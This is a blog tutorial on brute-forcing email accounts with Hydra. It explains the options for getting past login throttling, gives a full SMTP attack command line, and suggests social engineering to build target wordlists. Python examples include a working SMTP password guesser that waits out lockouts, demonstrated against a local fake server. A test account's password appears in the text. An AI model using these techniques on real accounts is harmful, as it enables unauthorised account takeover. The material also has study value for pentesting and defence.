Wednesday, October 12, 2016

Hydra

In this post, I will continue with cracking-type attacks, this time against email accounts. Email credentials play an important role in cyber security because almost every platform, from social media sites and forums to many applications, uses an email address to create and then manage accounts. So it is critical to keep your passwords strong and to change them periodically. Mail servers can also be configured by administrators to resist brute-force attacks: after a certain number of failed login attempts the server starts refusing or delaying your connections, and that is when you need to dig deeper into how you can work around this sort of restriction. Slowing the attack down, by adjusting the wait times of your cracking process and the number of parallel connections, can help at this point.

Hydra is a network login cracker that comes preinstalled in Kali Linux. Unlike offline hash crackers, it works by actually logging in to a live service over the network, and it supports plenty of protocols: SSH, RDP and HTTP are just a few of them. You should take a look at the full list here. There is also a GUI version of this tool, Hydra-GTK, but I am going to stick with the console-based one. What I am going to do in this tutorial is prepare a wordlist containing the right password and then run a dictionary (wordlist) attack with it.

Let's get back to the program. Hydra, like the previous tools, is simple and yet practical. Some parameters are used far more often than others. To see the full list of options, type hydra -h.


(-R) Restore a previous aborted or crashed session and carry on from where you stopped.
(-S) Perform an SSL/TLS connection. Use it for HTTPS pages and for services that expect TLS from the first byte, such as SMTP submission on port 465.
(-s) Lower case s sets the port of the service when it differs from the module's default (25 for the smtp module). Mail submission usually runs on 587 (STARTTLS) or 465 (implicit TLS), but this varies from server to server; for 587 the smtp module can be told to negotiate STARTTLS with its TLS module option (see hydra -U smtp).
(-l, -L) Lower case l is for a single username. Let's say you have three usernames and a wordlist for a certain SSH server but are not sure which password belongs to which user: put the usernames in a file and pass it with upper case -L.
(-p, -P) Similarly, you have single and plural options for the password.
(-x) Generate candidate passwords instead of reading them from a file. For example, -x 4:6:A1 generates every string of 4 to 6 characters made of upper case letters and digits. For those who want to dig deeper, take a look at hydra -x -h.
(-t) Number of parallel connections per target (the default is 16).
(-w) Wait time, in seconds, for a response from the server. The related upper case -W sets the wait between connects per thread, which is the knob to turn up when a server starts throttling you.
(-v) Verbose mode.
(-V) Shows every login/password pair attempted.
(-f) Exit as soon as a successful login is found.
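To see why -x is rarely the right tool against a live server, here is an added example (not from the post) that expands a -x charset spec the way hydra documents it ('a' lowercase, 'A' uppercase, '1' digits, anything else literal) and works out the size of the keyspace behind the post's own 4:6:A1 example. The attempt rate at the bottom is a constructed figure, not a measurement.

```python
# Added example, not code from the original post: how big the keyspace behind
# hydra's -x MIN:MAX:CHARSET option is, and what that means for an online target.
import string


def hydra_charset(spec):
    """Expand a -x charset spec: 'a' = lowercase, 'A' = uppercase, '1' = digits,
    anything else is taken literally (so 'A1!' also allows the '!' symbol)."""
    chars = []
    for ch in spec:
        chars += {"a": string.ascii_lowercase, "A": string.ascii_uppercase,
                  "1": string.digits}.get(ch, ch)
    return "".join(dict.fromkeys(chars))  # drop duplicates, keep order


def keyspace_size(min_len, max_len, spec):
    """Number of candidates -x MIN:MAX:CHARSET would generate."""
    n = len(hydra_charset(spec))
    return sum(n ** length for length in range(min_len, max_len + 1))


def days_to_exhaust(min_len, max_len, spec, attempts_per_second):
    """Worst-case wall-clock days at a given rate of online login attempts."""
    return keyspace_size(min_len, max_len, spec) / attempts_per_second / 86400


if __name__ == "__main__":
    # The post's example, -x 4:6:A1, at an optimistic 50 attempts per second
    # (constructed figure: 16 parallel connections, a few logins each per second).
    print(keyspace_size(4, 6, "A1"), "candidates,",
          round(days_to_exhaust(4, 6, "A1", 50)), "days worst case")
```

Over two billion candidates at 50 logins per second is well over a year of hammering a server that, as the post notes, will have locked you out long before; this is why a targeted wordlist beats -x for online attacks.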


Those above are the common parameters. Every SMTP server listens on a port for mail traffic, and mail client software needs POP3 (or IMAP) and SMTP access, so you should find out which port your target mail server uses before you start. Here is a link where you can find a list of mail servers and their port numbers.




I created an account on Yandex's mail server beforehand for the sake of this tutorial. The account we are going to work on is pentestingtr@yandex.com and its password is password123. I added this password to the wordlist. I do not recommend a lengthy password list against an online target: tools like crunch can prepare a more specific wordlist for a certain target, and without one the attack would take a very long time. One of the overarching steps in password cracking is to gather as much information as you can about the target, through social engineering among other means, so that you can guess combinations of dates of birth, names and the like. Wordlist generators can do that in a more automated way.
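What Hydra actually does for each line of the wordlist, as an added example that is not part of the original post: it opens a connection, performs SMTP AUTH LOGIN (two base64-encoded challenge/response rounds, username then password) and reads the reply code. The fake server below is constructed for the demo and locks clients out after three failures, which is the situation described at the top of the post; the guessing loop waits out the lockout and retries the same candidate instead of skipping it. The account and password are the ones from the post; the wordlist and the server's policy are made up. For a real run the equivalent Hydra command line would be hydra -l pentestingtr@yandex.com -P wordlist.txt -s 465 -S -f -V MAILHOST smtp, with MAILHOST standing in for the provider's SMTP host, which the post does not show.

```python
# Added example, not code from the original post: a model of what hydra's smtp
# module does on the wire (SMTP AUTH LOGIN, one connection per guess) against a
# constructed fake server that locks clients out after a few failed logins.
import base64, socket, socketserver, threading, time

ACCOUNTS = {"pentestingtr@yandex.com": "password123"}  # the account from the post
WORDLIST = ["123456", "qwerty", "letmein", "Password1", "password123"]  # constructed
MAX_FAILURES = 3       # fake server policy: 3 bad logins, then...
LOCKOUT_SECONDS = 1.0  # ...every new connection is refused with 421 for this long


class FakeSmtpHandler(socketserver.StreamRequestHandler):
    """Constructed stand-in for a mail server with a simple failure limit."""
    lock = threading.Lock()  # state lives on the class (global, not per IP)
    failures = 0             # consecutive bad logins so far
    locked_until = 0.0       # time.monotonic() deadline of the current lockout
    lockouts = 0             # connections refused with 421

    def reply(self, line):
        self.wfile.write((line + "\r\n").encode())

    def handle(self):
        cls = FakeSmtpHandler
        with cls.lock:
            if time.monotonic() < cls.locked_until:
                cls.lockouts += 1
                self.reply("421 4.7.0 Too many failed logins, try again later")
                return
        self.reply("220 fake.example ESMTP ready")
        while True:
            cmd = self.rfile.readline().decode(errors="replace").strip().upper()
            if not cmd or cmd == "QUIT":  # client went away or said goodbye
                return
            if cmd.startswith(("EHLO", "HELO")):
                self.reply("250-fake.example")  # '-' after the code: more lines follow
                self.reply("250 AUTH LOGIN PLAIN")
            elif cmd == "AUTH LOGIN":  # two base64 challenge/response rounds
                self.reply("334 VXNlcm5hbWU6")  # base64("Username:")
                user = base64.b64decode(self.rfile.readline().strip()).decode()
                self.reply("334 UGFzc3dvcmQ6")  # base64("Password:")
                pwd = base64.b64decode(self.rfile.readline().strip()).decode()
                if ACCOUNTS.get(user) == pwd:
                    self.reply("235 2.7.0 Authentication successful")
                    continue
                with cls.lock:  # count the failure; at the limit, start a lockout
                    cls.failures += 1
                    if cls.failures >= MAX_FAILURES:
                        cls.failures = 0
                        cls.locked_until = time.monotonic() + LOCKOUT_SECONDS
                self.reply("535 5.7.8 Authentication credentials invalid")


def smtp_auth_login(host, port, user, password):
    """One guess, as AUTH LOGIN goes over the wire. Returns the final reply
    code: 235 success, 535 wrong credentials, 421 refused or locked out."""
    with socket.create_connection((host, port), timeout=5) as sock:
        rfile = sock.makefile("rb")

        def exchange(line=None):
            # Send a line (if given); return the reply code, skipping "250-" continuations.
            if line is not None:
                sock.sendall((line + "\r\n").encode())
            while True:
                reply = rfile.readline().decode(errors="replace")
                if not reply:
                    return 421  # connection dropped: treat it like a refusal
                if reply[3:4] != "-":
                    return int(reply[:3])

        if exchange() == 421:  # the server greeting
            return 421
        exchange("EHLO guesser.example")
        exchange("AUTH LOGIN")
        exchange(base64.b64encode(user.encode()).decode())
        result = exchange(base64.b64encode(password.encode()).decode())
        sock.sendall(b"QUIT\r\n")
        return result


def guess_password(host, port, user, wordlist, wait=0.1):
    """Try candidates in order; on a 421 wait out the lockout and retry the same one."""
    attempts, i = 0, 0
    while i < len(wordlist):
        code = smtp_auth_login(host, port, user, wordlist[i])
        attempts += 1
        if code == 235:
            return wordlist[i], attempts
        if code == 421:
            time.sleep(LOCKOUT_SECONDS + 0.1)  # back off, keep i unchanged
            continue
        i += 1
        time.sleep(wait)  # pacing between guesses, the job of hydra's -W
    return None, attempts


def run_demo():
    """Attack the fake server on a free loopback port; attempts == len(WORDLIST) + lockouts."""
    FakeSmtpHandler.failures, FakeSmtpHandler.locked_until, FakeSmtpHandler.lockouts = 0, 0.0, 0
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSmtpHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    found, attempts = guess_password("127.0.0.1", server.server_address[1],
                                     "pentestingtr@yandex.com", WORDLIST)
    server.shutdown()
    return {"password": found, "attempts": attempts, "lockouts": FakeSmtpHandler.lockouts}
```

Calling run_demo() returns the recovered password together with the attempt count, which comes out as the five candidates plus one extra attempt for every 421 the server handed back (normally one here). The point to take from it is the back-off: a tool that simply moves on after a refused connection silently skips candidates, which is why Hydra's wait settings and its -R restore file matter more against a throttling server than raw speed.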





As we predicted, it eventually found the right password successfully.

